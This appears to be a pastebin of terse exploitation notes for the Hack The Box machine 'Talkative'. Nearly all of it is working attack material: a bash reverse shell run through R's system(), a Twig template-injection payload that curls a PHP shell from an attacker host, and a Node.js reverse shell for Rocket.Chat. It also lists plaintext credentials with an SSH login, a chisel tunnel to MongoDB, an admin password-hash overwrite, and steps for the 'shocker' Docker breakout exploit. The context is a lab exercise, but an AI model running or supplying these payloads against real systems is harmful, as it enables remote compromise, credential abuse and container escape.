Mr_hEx

talkative htb

May 4th, 2022 (edited)
  1. #Port 8080 => RCE
  2. system("echo 'bash -i >& /dev/tcp/10.10.14.122/4400 0>&1' > /tmp/null.sh;chmod +x /tmp/null.sh;bash /tmp/null.sh", intern = TRUE)
  3.  
  4. #from port 8080 :
  5. {"A": {"labels": [[0, "Username", "Username", false], [1, "matt@talkative.htb", "matt@talkative.htb", false], [2, "janit@talkative.htb", "janit@talkative.htb", false], [3, "saul@talkative.htb", "saul@talkative.htb", false]]}, "B": {"labels": [[0, "Password", "Password", false], [1, "jeO09ufhWD<s", "jeO09ufhWD<s", false], [2, "bZ89h}V<S_DA", "bZ89h}V<S_DA", false], [3, ")SQWGm>9KHEA", ")SQWGm>9KHEA", false]]}, "C": {"labels": []}}
  6.  
  7.  
  8. #for bolt SSTI
  9. {{['curl --connect-timeout 5 http://10.10.14.153:8000/shell2.txt -o hex.php']|filter('system')}}
  10.  
  11.  
  12.  
  13. #for saul user locally !!
  14. ssh saul@10.10.11.155
  15. pass : jeO09ufhWD<s
  16.  
  17.  
  18. #for tunnel connection => mongoDB
  19. ./chisel server -p 2030 --reverse
  20. ./chisel client 10.10.14.128:2030 R:27017:172.17.0.2:27017
  21.  
  22. #for update admin password
  23. db.getCollection('users').update({username:"admin"}, {$set: {"services" :{"password":{"bcrypt":"$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG"}}}})
  24.  
  25.  
  26. #for rocket chat RCE
  27. const require = console.log.constructor('return process.mainModule.require')();
  28. var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
  29. var client = new net.Socket();
  30. client.connect(7700, "10.10.14.128", function(){
  31. client.pipe(sh.stdin);
  32. sh.stdout.pipe(client);
  33. sh.stderr.pipe(client);
  34. });
  35.  
  36. #transfer a file over /dev/tcp
  37. cat < /dev/tcp/IP/PORT > FileName
  38. nc -lvnp 2030 < FileName
  39.  
  40.  
  41. #root !!
  42. 1 - check linux capabilities
  43. 2 - decode it locally; there I found => cap_dac_read_search
  44. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_dac_read_search
  45. https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
  46. https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html
  47. http://stealth.openwall.net/xSports/shocker.c
  48. If you want the exploit to work, edit this : if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0) => if ((fd1 = open("/etc/hosts", O_RDONLY)) < 0)
  49. then compile it locally, transfer it, and run it
  50.  
  51.  